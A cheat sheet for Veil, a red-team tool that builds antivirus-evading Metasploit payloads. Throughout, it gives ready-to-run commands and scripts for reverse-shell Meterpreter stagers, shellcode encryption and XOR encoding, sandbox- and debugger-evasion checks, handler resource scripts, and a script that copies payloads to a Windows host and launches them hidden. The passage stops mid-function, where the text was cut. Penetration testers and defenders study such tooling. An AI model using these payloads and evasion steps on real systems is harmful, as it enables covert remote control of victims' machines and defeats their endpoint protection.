# Veil Cheat Sheet
## Overview
Veil is a tool for generating Metasploit-compatible payloads that evade common antivirus products. It is part of the Veil-Framework and focuses on payload generation, source obfuscation and shellcode encryption/encoding so that the resulting executable is not flagged by antivirus and endpoint-protection software. Veil supports several source languages (Python, C#, PowerShell, Go and others) and several encryption and encoding techniques, and it produces payloads for penetration tests and red team operations.
**Warning:** only use Veil in environments you own or have explicit, written permission to test. Unauthorized use may violate terms of service or local law. This tool is intended for legitimate security testing only.
## Installation
### Automated installation
```bash
# Clone the repository
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Run the setup script (installs Wine, Windows Python/pyinstaller, MinGW, Mono, Go and the Python deps)
sudo ./config/setup.sh --force --silent
# Verify installation
./Veil.py --version
```
### Manual installation
```bash
# Install dependencies
sudo apt update
sudo apt install -y python3 python3-pip git
# Install Python dependencies
pip3 install pycryptodome   # maintained drop-in replacement for the pycrypto package older guides list
pip3 install distorm3
pip3 install pefile
pip3 install capstone
# Install the compilers Veil invokes
sudo apt install -y mingw-w64    # C payloads
sudo apt install -y mono-mcs     # C# payloads
sudo apt install -y golang-go    # Go payloads
# Clone Veil
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Make executable
chmod +x Veil.py
# Python payloads are still compiled with pyinstaller under Wine, which only setup.sh installs, so run it afterwards
sudo ./config/setup.sh --force
```
### Docker installation
```bash
# Pull Docker image
docker pull mattiasohlsson/veil
# Run Veil in Docker
docker run -it --rm -v $(pwd):/output mattiasohlsson/veil
# Create alias for easier usage
echo 'alias veil="docker run -it --rm -v $(pwd):/output mattiasohlsson/veil"' >> ~/.bashrc
source ~/.bashrc
```
### Kali Linux installation
```bash
# Veil is packaged for Kali Linux; if it is not already present, install it via apt
sudo apt update
sudo apt install veil
veil
# Update to the latest version
cd /usr/share/veil
sudo git pull
```
## Basic usage
### Interactive mode
```bash
# Start Veil in interactive mode
./Veil.py
# Or, if installed system-wide
veil
# Main menu tools
# 1) Evasion  (payload generation and compilation)
# 2) Ordnance (local shellcode generation, an alternative to msfvenom)
# Inside Evasion: `list` shows payloads, `use <number|name>` selects one,
# `options` shows that payload's options, `set OPTION value`, then `generate`
```
### Command-line mode
Veil has no `--output-dir` or `--payload-options` switches. Output always goes under `/var/lib/veil/output/` (`source/`, `compiled/`, `handlers/`), `-o` sets the base name of the three files, and payload options are passed as `-c OPTION=value [OPTION=value ...]`; the interactive `options` command is the way to list the options a given payload accepts.
```bash
# List available tools and payloads
./Veil.py --list-tools
./Veil.py -t Evasion --list-payloads
# Generate a payload non-interactively
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Name the output files (/var/lib/veil/output/compiled/svc_update.exe etc.)
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -o svc_update
# Pass payload-specific options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c SLEEP=30 DOMAIN=corp.local
# Update Veil / re-run setup / wipe generated files
./Veil.py --update
./Veil.py --setup
./Veil.py --clean
```
## Payload generation
Payload names are `<language>/<type>/<variant>` as printed by `--list-payloads`. `meterpreter/*` payloads are Meterpreter stagers written in that language and take `--ip`/`--port` directly. `shellcode_inject/*` payloads wrap arbitrary shellcode in a stub and need a shellcode source: `--ordnance-payload <stager>` (generated locally by Veil-Ordnance) or `--msfvenom <msf payload> --msfoptions LHOST=... LPORT=...`.
### Python payloads
```bash
# Python reverse TCP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Python reverse HTTP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Python reverse HTTPS Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Python shellcode injection (flat), shellcode generated by Veil-Ordnance
./Veil.py -t Evasion -p python/shellcode_inject/flat --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444
# Python shellcode injection, AES-encrypted, shellcode generated by msfvenom
./Veil.py -t Evasion -p python/shellcode_inject/aes_encrypt --msfvenom windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.1.100 LPORT=4444
```
### C# payloads
```bash
# C# reverse TCP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# C# reverse HTTP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_http --ip 192.168.1.100 --port 80
# C# reverse HTTPS Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_https --ip 192.168.1.100 --port 443
# C# shellcode injection via VirtualAlloc
./Veil.py -t Evasion -p cs/shellcode_inject/virtual --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444
# C# shellcode injection with base64-encoded shellcode
./Veil.py -t Evasion -p cs/shellcode_inject/base64 --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444
```
### PowerShell payloads
```bash
# PowerShell reverse TCP
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# PowerShell reverse HTTP
./Veil.py -t Evasion -p powershell/meterpreter/rev_http --ip 192.168.1.100 --port 80
# PowerShell reverse HTTPS
./Veil.py -t Evasion -p powershell/meterpreter/rev_https --ip 192.168.1.100 --port 443
# PowerShell shellcode injection
./Veil.py -t Evasion -p powershell/shellcode_inject/virtual --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444
```
### Go payloads
```bash
# Go reverse TCP
./Veil.py -t Evasion -p go/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Go reverse HTTP
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Go reverse HTTPS
./Veil.py -t Evasion -p go/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Go shellcode injection
./Veil.py -t Evasion -p go/shellcode_inject/virtual --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444
```
## Advanced evasion options
Veil has no generic `--encoding`, `--encryption`, `--sleep`, `--vm-check`, `--icon` or `--version-info` switches. The transformation applied to the shellcode is chosen by the payload module (`shellcode_inject/aes_encrypt`, `shellcode_inject/base64`, ...), Ordnance encodes raw shellcode with `-e`, and the runtime host checks are payload options passed with `-c OPTION=value [OPTION=value ...]`. Run `options` on a payload in the interactive menu to see what that module accepts: the Python modules expose the largest set of checks, the C#, PowerShell and Go modules a subset. Icons, version resources and service wrappers are not something Veil does; they are post-processing steps outside the tool.
### Encryption and obfuscation
```bash
# AES-encrypted shellcode in a Python stub
./Veil.py -t Evasion -p python/shellcode_inject/aes_encrypt --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444
# Base64-encoded shellcode in a C# stub
./Veil.py -t Evasion -p cs/shellcode_inject/base64 --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444
# Letter-substitution encoded shellcode in a Python stub
./Veil.py -t Evasion -p python/shellcode_inject/letter_substitution --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444
# Pyherion: encrypt the generated Python source itself before the pyinstaller build
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c USE_PYHERION=Y
# Arya: obfuscate the generated C# source before compiling
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c USE_ARYA=Y
# Ordnance: XOR-encode raw shellcode and keep it free of bad characters
./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444 -e xor -b '\x00\x0a' --print-stats
```
### Anti-analysis checks
```bash
# Sleep 30 s before running; the stub also checks that the sleep was not accelerated by a sandbox
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c SLEEP=30
# Only run on a host joined to the expected domain
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c DOMAIN=corp.local
# Only run on a specific hostname and/or username
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c HOSTNAME=WS01 USERNAME=jdoe
# Require a minimum number of processors (sandboxes often expose a single one)
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c PROCESSORS=2
# Python modules: debugger, VM-process and sandbox-process checks, minimum 3 GB of RAM
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c DETECTDEBUG=TRUE VIRTUALPROC=TRUE SANDBOXPROCESS=TRUE MINRAM=TRUE
```
### Build options
```bash
# Generate the source only, without compiling
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c COMPILE_TO_EXE=N
# Injection method for shellcode_inject modules (Virtual or Heap)
./Veil.py -t Evasion -p python/shellcode_inject/flat --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444 -c INJECT_METHOD=Heap
# Expire the payload after 7 days (date check at runtime)
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c EXPIRE_PAYLOAD=7
# Require the user to click a prompt before execution (defeats unattended sandboxes)
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c USERPROMPT=TRUE
# Compiler for Python payloads (pyinstaller is the default)
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --compiler pyinstaller
```
## Output files and Veil-Ordnance
### Generated files
There is no `--output-type` switch and no DLL, service or raw-shellcode output mode in Evasion. Every Evasion run writes three files under `/var/lib/veil/output/` named after `-o` (or an auto-generated name); `-c COMPILE_TO_EXE=N` stops after the source when only the source is wanted.
```bash
# Generated source (.py, .cs, .ps1, .go, ...)
ls /var/lib/veil/output/source/
# Compiled executable
ls /var/lib/veil/output/compiled/
# Matching Metasploit handler resource script
ls /var/lib/veil/output/handlers/
# Name the artifacts
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -o svc_update
# Source only
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -c COMPILE_TO_EXE=N
# Wipe everything under the output folders
./Veil.py --clean
```
### Veil-Ordnance
Ordnance is a local shellcode generator (an alternative to msfvenom for the stagers it supports), not a delivery tool: HTA, Office macro, SCT and JavaScript droppers are not part of Veil. Its output is raw shellcode, either printed for use elsewhere or consumed by an Evasion `shellcode_inject` module through `--ordnance-payload`.
```bash
# Generate reverse TCP stager shellcode
./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444
# Reverse HTTPS stager
./Veil.py -t Ordnance --ordnance-payload rev_https --ip 192.168.1.100 --port 443
# Supported stagers: rev_tcp, rev_http, rev_https, rev_tcp_dns, rev_tcp_all_ports, bind_tcp
# List the available encoders
./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444 --list-encoders
# XOR-encode, avoid bad characters, print size/encoding statistics
./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.100 --port 4444 -e xor -b '\x00\x0a\x0d' --print-stats
```
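What Ordnance's `-e xor -b '\x00\x0a'` (and, at the source level, the `shellcode_inject/*` encoding modules) has to solve is: find a key such that neither the key byte nor any encoded byte is a bad character, then prove the round trip restores the original. The example below is added here to show that search and verification; it is not Veil's or Ordnance's own encoder, it stops short of emitting the decoder stub (which must itself be badchar-free), and `SAMPLE_SHELLCODE` is the well-known 23-byte Linux x86 `execve("/bin/sh")` stub used purely as sample bytes.

```python
"""Single-byte XOR shellcode encoder with bad-character avoidance.

Added example, not Veil-Ordnance's own code. It demonstrates the key search
behind `-e xor -b ...`: pick a key byte so that the key and every encoded
byte stay out of the bad-character set, verify the round trip, and render
the result in the "\\x.." form that generated payload sources use.
"""
from __future__ import annotations

# Sample bytes only: the classic Linux x86 execve("/bin/sh") stub (23 bytes).
SAMPLE_SHELLCODE = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80")


def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; XOR is its own inverse, so decoding is the same call."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    return bytes(b ^ key for b in data)


def find_key(data: bytes, badchars: bytes) -> int:
    """Return the first key in 1..255 whose encoded output and key byte avoid badchars.

    Key 0 is skipped because it leaves the shellcode unchanged, and keys that are
    themselves bad characters are skipped because the decoder stub has to embed the key.
    """
    bad = set(badchars)
    for key in range(1, 256):
        if key in bad:
            continue
        if not any((b ^ key) in bad for b in data):
            return key
    raise ValueError("no single-byte XOR key avoids the given bad characters")


def encode_with_badchars(data: bytes, badchars: bytes) -> tuple[int, bytes]:
    """Encode with a badchar-free key and verify the result before handing it out."""
    key = find_key(data, badchars)
    encoded = xor_encode(data, key)
    if xor_encode(encoded, key) != data:          # round trip must restore the original
        raise RuntimeError("round-trip check failed")
    if set(encoded) & set(badchars):              # belt and braces: re-check the output
        raise RuntimeError("encoded output still contains a bad character")
    return key, encoded


def escaped(data: bytes) -> str:
    """Render bytes as the \\x.. string form used in generated payload source."""
    return "".join(f"\\x{b:02x}" for b in data)


def stats(original: bytes, encoded: bytes, key: int) -> dict[str, int]:
    """The kind of numbers --print-stats reports: key, sizes, and how many bytes changed."""
    return {
        "key": key,
        "original_len": len(original),
        "encoded_len": len(encoded),
        "changed_bytes": sum(1 for a, b in zip(original, encoded) if a != b),
    }


if __name__ == "__main__":
    badchars = b"\x00\x0a\x0d"
    key, enc = encode_with_badchars(SAMPLE_SHELLCODE, badchars)
    print(f"key=0x{key:02x}")
    print("encoded:", escaped(enc))
    print("stats:", stats(SAMPLE_SHELLCODE, enc, key))
```

With `\x00\x0a\x0d` as bad characters the search rejects key 1 (the `0x0b` byte of the sample would encode to `0x0a`) and settles on key 2; a buffer containing all 256 byte values raises, because any single-byte XOR of it is a permutation that still contains every bad character, which is exactly the case where a multi-byte or rolling encoder is needed.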
## Integration with Metasploit
Veil writes a matching handler script for every payload it generates (`/var/lib/veil/output/handlers/<name>.rc`), so `msfconsole -r` on that file is usually all that is needed. Every Veil Meterpreter stager, whatever its source language, is a Windows artifact that stages `windows/meterpreter/reverse_*`, so the handler payload must match the transport (`rev_tcp` -> `reverse_tcp`, `rev_http` -> `reverse_http`, `rev_https` -> `reverse_https`) and the port given to Veil.
### Handler configuration
```bash
# Use the handler script Veil generated for the payload named with -o
msfconsole -q -r /var/lib/veil/output/handlers/svc_update.rc
# Or start the handler by hand: Meterpreter over TCP
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_tcp;
set LHOST 192.168.1.100;
set LPORT 4444;
set ExitOnSession false;
exploit -j"
# Handler for an HTTP payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_http;
set LHOST 192.168.1.100;
set LPORT 80;
exploit -j"
# Handler for an HTTPS payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_https;
set LHOST 192.168.1.100;
set LPORT 443;
exploit -j"
```
### Resource scripts
```bash
# Create a Metasploit resource script
cat > veil_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
EOF
# Use the resource script
msfconsole -r veil_handler.rc
# Several handlers in one resource script (each needs its own port)
cat > multi_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 80
set ExitOnSession false
exploit -j
EOF
```
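The handler must be derived from the Veil payload path and port, and two handlers cannot share a port. The example below, added here and not part of the Veil project, builds a multi-handler resource script from a list of `(veil_payload, port)` pairs: it maps the transport suffix to the Metasploit payload, rejects `shellcode_inject` paths (their handler depends on the `--msfvenom`/`--ordnance-payload` choice, not on the Veil path) and collapses duplicate (payload, port) pairs that msfconsole would refuse to bind twice. `SAMPLE_PAYLOADS` is constructed sample data.

```python
"""Build a Metasploit handler resource script for a set of Veil-Evasion payloads.

Added example, not part of the Veil project. Veil stagers are staged by the
Windows Meterpreter handlers regardless of source language, so the mapping
only depends on the transport suffix of the Veil payload path.
"""
from __future__ import annotations

# Veil transport suffix -> Metasploit handler payload.
TRANSPORTS = {
    "rev_tcp": "windows/meterpreter/reverse_tcp",
    "rev_http": "windows/meterpreter/reverse_http",
    "rev_https": "windows/meterpreter/reverse_https",
}


def msf_payload_for(veil_payload: str) -> str:
    """Return the handler payload for a Veil meterpreter payload path.

    Accepts 'cs/meterpreter/rev_tcp' and 'cs/meterpreter/rev_tcp.py'. Raises
    ValueError for shellcode_inject payloads, whose handler is decided by the
    shellcode source (--msfvenom / --ordnance-payload), not by the Veil path.
    """
    parts = veil_payload.removesuffix(".py").split("/")
    if len(parts) != 3 or parts[1] != "meterpreter" or parts[2] not in TRANSPORTS:
        raise ValueError(f"no fixed handler for Veil payload {veil_payload!r}")
    return TRANSPORTS[parts[2]]


def handler_block(msf_payload: str, lhost: str, lport: int) -> str:
    """One exploit/multi/handler stanza, backgrounded so several can be stacked."""
    return (
        "use exploit/multi/handler\n"
        f"set payload {msf_payload}\n"
        f"set LHOST {lhost}\n"
        f"set LPORT {lport}\n"
        "set ExitOnSession false\n"
        "exploit -j\n"
    )


def build_handlers_rc(lhost: str, payloads: list[tuple[str, int]]) -> str:
    """One handler per distinct (msf payload, port); a repeated pair is emitted once,
    since a second handler on the same port would fail to bind."""
    seen: set[tuple[str, int]] = set()
    blocks: list[str] = []
    for veil_payload, port in payloads:
        key = (msf_payload_for(veil_payload), port)
        if key in seen:
            continue
        seen.add(key)
        blocks.append(handler_block(key[0], lhost, port))
    return "".join(blocks)


# Constructed sample: the same set the batch script in this sheet generates.
SAMPLE_PAYLOADS = [
    ("python/meterpreter/rev_tcp", 4444),
    ("python/meterpreter/rev_http", 80),
    ("cs/meterpreter/rev_tcp", 4445),
    ("cs/meterpreter/rev_http", 8080),
    ("powershell/meterpreter/rev_tcp", 4446),
    ("go/meterpreter/rev_tcp.py", 4447),
]

if __name__ == "__main__":
    import sys

    rc = build_handlers_rc("192.168.1.100", SAMPLE_PAYLOADS)
    path = sys.argv[1] if len(sys.argv) > 1 else "handlers.rc"
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(rc)
    print(f"wrote {rc.count('use exploit/multi/handler')} handlers to {path}")
```

Run it as `python3 build_handlers.py handlers.rc` (name assumed) and load the result with `msfconsole -r handlers.rc`.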
## Automation scripts
### Batch payload generation
Veil has no `--output-dir`, `--output-name` or `--force` switches; the script below names each build with `-o`, copies the compiled file out of `/var/lib/veil/output/compiled/`, and derives one handler stanza per payload from the Veil payload name and port.
```bash
#!/bin/bash
# Generate several Veil payloads, collect them in one directory and write a combined handler .rc
set -u
VEIL="${VEIL:-./Veil.py}"                 # run from the Veil checkout, or set VEIL=veil
VEIL_OUT="/var/lib/veil/output"           # Veil's default output root
LHOST="192.168.1.100"
OUTPUT_DIR="veil_payloads_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
# payload:port:name
PAYLOADS=(
    "python/meterpreter/rev_tcp:4444:python_tcp"
    "python/meterpreter/rev_http:80:python_http"
    "cs/meterpreter/rev_tcp:4445:cs_tcp"
    "cs/meterpreter/rev_http:8080:cs_http"
    "powershell/meterpreter/rev_tcp:4446:ps_tcp"
    "go/meterpreter/rev_tcp:4447:go_tcp"
)
echo "[+] Generating Veil payloads..."
echo "[+] LHOST: $LHOST"
echo "[+] Output directory: $OUTPUT_DIR"
: > "$OUTPUT_DIR/handlers.rc"
for payload_config in "${PAYLOADS[@]}"; do
    IFS=':' read -r payload port name <<< "$payload_config"
    echo "[+] Generating $name ($payload:$port)"
    if "$VEIL" -t Evasion -p "$payload" --ip "$LHOST" --port "$port" -o "$name"; then
        cp "$VEIL_OUT/compiled/$name".* "$OUTPUT_DIR/" 2>/dev/null
        # rev_tcp -> reverse_tcp, rev_http -> reverse_http, rev_https -> reverse_https
        transport="${payload##*/}"
        msf_payload="windows/meterpreter/reverse_${transport#rev_}"
        cat >> "$OUTPUT_DIR/handlers.rc" << EOF
use exploit/multi/handler
set payload $msf_payload
set LHOST $LHOST
set LPORT $port
set ExitOnSession false
exploit -j
EOF
        echo "    ✓ Success: $name"
    else
        echo "    ✗ Failed: $name"
    fi
done
echo "[+] Payload generation completed"
echo "[+] Generated files:"
ls -la "$OUTPUT_DIR"
echo "[+] Metasploit resource script created: $OUTPUT_DIR/handlers.rc"
```
### Payload testing script
Uploading a sample to VirusTotal hands it to every participating AV vendor, so a payload that is "undetected" today will usually be signatured within days; Veil itself warns against submitting its output. Prefer the hash-only lookup (`checkvt` in the Evasion menu, or the `/files/{sha256}` endpoint) and a lab VM running the target product, and reserve the upload script below for samples you are willing to burn.
```bash
#!/bin/bash
# Upload generated payloads to VirusTotal and collect detection statistics
set -u
PAYLOAD_DIR="${1:-}"
VIRUSTOTAL_API_KEY="${VIRUSTOTAL_API_KEY:-your_api_key_here}"
if [ -z "$PAYLOAD_DIR" ]; then
    echo "Usage: $0 <payload_directory>"
    exit 1
fi
if [ ! -d "$PAYLOAD_DIR" ]; then
    echo "Error: Directory not found: $PAYLOAD_DIR"
    exit 1
fi
echo "[+] Testing payloads in: $PAYLOAD_DIR"
# Upload one file; the analysis id is stored so the result can be fetched later
upload_to_vt() {
    local file="$1"
    local filename
    filename=$(basename "$file")
    echo "[+] Uploading $filename to VirusTotal..."
    if response=$(curl -s -X POST \
        -H "x-apikey: $VIRUSTOTAL_API_KEY" \
        -F "file=@$file" \
        "https://www.virustotal.com/api/v3/files"); then
        scan_id=$(echo "$response" | jq -r '.data.id')
        echo "    Scan ID: $scan_id"
        echo "$filename:$scan_id" >> "$PAYLOAD_DIR/vt_scans.txt"
    else
        echo "    Upload failed"
    fi
}
# Fetch the analysis and append its counters to the CSV
check_vt_results() {
    local scan_id="$1"
    local filename="$2"
    echo "[+] Checking results for $filename..."
    if response=$(curl -s -X GET \
        -H "x-apikey: $VIRUSTOTAL_API_KEY" \
        "https://www.virustotal.com/api/v3/analyses/$scan_id"); then
        status=$(echo "$response" | jq -r '.data.attributes.status')
        if [ "$status" = "completed" ]; then
            stats=$(echo "$response" | jq -r '.data.attributes.stats')
            malicious=$(echo "$stats" | jq -r '.malicious')
            suspicious=$(echo "$stats" | jq -r '.suspicious')
            undetected=$(echo "$stats" | jq -r '.undetected')
            echo "    Status: $status"
            echo "    Malicious: $malicious"
            echo "    Suspicious: $suspicious"
            echo "    Undetected: $undetected"
            echo "$filename,$malicious,$suspicious,$undetected" >> "$PAYLOAD_DIR/detection_results.csv"
        else
            echo "    Status: $status (still processing)"
        fi
    else
        echo "    Failed to get results"
    fi
}
# Upload all executables
echo "[+] Uploading payloads..."
for file in "$PAYLOAD_DIR"/*.exe; do
    if [ -f "$file" ]; then
        upload_to_vt "$file"
        sleep 15   # public API rate limit
    fi
done
echo "[+] Waiting for scans to complete..."
sleep 300   # 5 minutes
# Check results
if [ -f "$PAYLOAD_DIR/vt_scans.txt" ]; then
    echo "filename,malicious,suspicious,undetected" > "$PAYLOAD_DIR/detection_results.csv"
    while IFS=':' read -r filename scan_id; do
        check_vt_results "$scan_id" "$filename"
        sleep 15   # public API rate limit
    done < "$PAYLOAD_DIR/vt_scans.txt"
    echo "[+] Results saved to: $PAYLOAD_DIR/detection_results.csv"
else
    echo "[-] No scans to check"
fi
```
### Payload deployment script
The target here is a lab Windows host running an OpenSSH server. The original draft created `/tmp/test_payloads` over ssh but executed from `C:\tmp\test_payloads`; the version below uses one Windows path for both, creates it with PowerShell (cmd.exe has no `mkdir -p`), and keeps the file name before `try` because inside a PowerShell `catch` block `$_` is the error record, not the pipeline item.
```bash
#!/bin/bash
# Copy generated payloads to a lab Windows host (OpenSSH) and stage an execution script
set -u
if [ $# -ne 3 ]; then
    echo "Usage: $0 <payload_directory> <target_host> <target_user>"
    exit 1
fi
PAYLOAD_DIR="$1"
TARGET_HOST="$2"
TARGET_USER="$3"
REMOTE_DIR_WIN='C:\tmp\test_payloads'     # as PowerShell sees it
REMOTE_DIR_SCP='C:/tmp/test_payloads'     # as scp to Windows OpenSSH accepts it
echo "[+] Deploying payloads to $TARGET_HOST"
# Create the remote directory (-Force makes it idempotent)
ssh "$TARGET_USER@$TARGET_HOST" "powershell -Command \"New-Item -ItemType Directory -Force -Path '$REMOTE_DIR_WIN' | Out-Null\""
# Copy payloads
for file in "$PAYLOAD_DIR"/*.exe; do
    [ -f "$file" ] || continue
    filename=$(basename "$file")
    echo "[+] Copying $filename..."
    if scp "$file" "$TARGET_USER@$TARGET_HOST:$REMOTE_DIR_SCP/"; then
        echo "    ✓ Copied successfully"
    else
        echo "    ✗ Copy failed"
    fi
done
# Create the execution script
cat > /tmp/execute_payloads.ps1 << 'EOF'
# PowerShell script to launch each staged payload in turn and log the outcome.
# "Started" only means the process launched; confirm success at the Metasploit handler
# and check the AV/EDR console for what was blocked.
$payloadDir = "C:\tmp\test_payloads"
$logFile = "$payloadDir\execution_log.txt"
Get-ChildItem -Path $payloadDir -Filter "*.exe" | ForEach-Object {
    $payload = $_.FullName
    $name = $_.Name
    $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    Write-Host "[+] Executing: $name"
    Add-Content -Path $logFile -Value "$timestamp - Executing: $name"
    try {
        Start-Process -FilePath $payload -WindowStyle Hidden
        Add-Content -Path $logFile -Value "$timestamp - Started: $name"
    }
    catch {
        Add-Content -Path $logFile -Value "$timestamp - Failed: $name - $($_.Exception.Message)"
    }
    Start-Sleep -Seconds 5
}
EOF
# Copy the execution script
scp /tmp/execute_payloads.ps1 "$TARGET_USER@$TARGET_HOST:$REMOTE_DIR_SCP/"
rm /tmp/execute_payloads.ps1
echo "[+] Deployment completed"
echo "[+] To execute payloads on the target:"
echo "    ssh $TARGET_USER@$TARGET_HOST"
echo "    powershell -ExecutionPolicy Bypass -File $REMOTE_DIR_WIN\\execute_payloads.ps1"
```
## Evasion testing
### Antivirus testing
Veil has no `--av-test`, `--av-report` or `--av-engines` switches and does not scan its output. What it does offer is `checkvt`, a hash-only lookup: it keeps the hash of every payload it generates and asks VirusTotal whether that hash is already known, without uploading the file. The reliable test is a lab VM running the target AV/EDR product with cloud submission disabled.
```bash
# Hash-only VirusTotal lookup for previously generated payloads (Evasion interactive menu)
./Veil.py -t Evasion
# [Veil-Evasion]: checkvt
# Plaintext indicators are the cheapest signature; nothing should match here
strings /var/lib/veil/output/compiled/svc_update.exe | grep -iE 'meterpreter|veil|shellcode'
# Every build is a new hash, so a second run does not reuse an already-known sample
sha256sum /var/lib/veil/output/compiled/*.exe
```
### Sandbox evasion
There is no `--sandbox-evasion`, `--time-check`, `--execution-delay` or `--file-check`; sandbox checks are `-c` options of the payload module, and the Python modules carry the widest set.
```bash
# Combine environment checks (Python module)
./Veil.py -t Evasion -p python/meterpreter/rev_tcp \
    --ip 192.168.1.100 \
    --port 4444 \
    -c SLEEP=60 PROCESSORS=2 MINRAM=TRUE VIRTUALPROC=TRUE SANDBOXPROCESS=TRUE DETECTDEBUG=TRUE
# Time-based: long sleep with acceleration check, and a payload that stops working after 5 days
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
    --ip 192.168.1.100 \
    --port 4444 \
    -c SLEEP=300 EXPIRE_PAYLOAD=5
# Environment identity checks: domain, hostname and user of the intended target
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
    --ip 192.168.1.100 \
    --port 4444 \
    -c DOMAIN=corp.local HOSTNAME=WS01 USERNAME=jdoe
```
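The `-c` checks above (and in the anti-analysis section) all reduce to the same decision: compare a host profile against the options and run only when nothing fails. The example below is added here as an illustration of that decision logic and is not Veil's generated payload code; the option names match Veil's (`X`/`FALSE` meaning "not set", `MINRAM` meaning "at least 3 GB"), while the `HostProfile` fields, the two sample profiles and the VM/sandbox process lists are assumptions for the demo. It shows why a typical sandbox profile (one CPU, 2 GB, workgroup, accelerated sleep, VMware tools running) fails every check a domain workstation passes.

```python
"""Host-check decision logic of the kind Veil's -c options compile into a payload.

Added example, not Veil's code. Option names follow Veil; the profile fields,
thresholds other than MINRAM's 3 GB, and the process lists are assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import date

# Assumed indicator lists for the demo (common VM guest-tool and analysis tool processes).
VM_PROCESSES = {"vmtoolsd.exe", "vboxservice.exe", "vboxtray.exe", "vmwaretray.exe"}
SANDBOX_PROCESSES = {"procmon.exe", "wireshark.exe", "ollydbg.exe", "x64dbg.exe"}


@dataclass(frozen=True)
class HostProfile:
    """What the running payload can observe about its host (assumed field set)."""
    hostname: str
    domain: str
    username: str
    processors: int
    ram_gb: float
    processes: tuple[str, ...]
    today: date
    sleep_elapsed: float   # wall-clock seconds that actually passed around a requested sleep


def failed_checks(host: HostProfile, opts: dict[str, str], built: date) -> list[str]:
    """Return the names of the -c options the host fails; empty means the payload would run."""
    def is_set(name: str) -> bool:
        return opts.get(name, "X").upper() not in ("X", "FALSE", "")

    failed: list[str] = []
    if is_set("HOSTNAME") and host.hostname.lower() != opts["HOSTNAME"].lower():
        failed.append("HOSTNAME")
    if is_set("DOMAIN") and host.domain.lower() != opts["DOMAIN"].lower():
        failed.append("DOMAIN")
    if is_set("USERNAME") and host.username.lower() != opts["USERNAME"].lower():
        failed.append("USERNAME")
    if is_set("PROCESSORS") and host.processors < int(opts["PROCESSORS"]):
        failed.append("PROCESSORS")
    if is_set("MINRAM") and host.ram_gb < 3:               # Veil's MINRAM: at least 3 GB
        failed.append("MINRAM")
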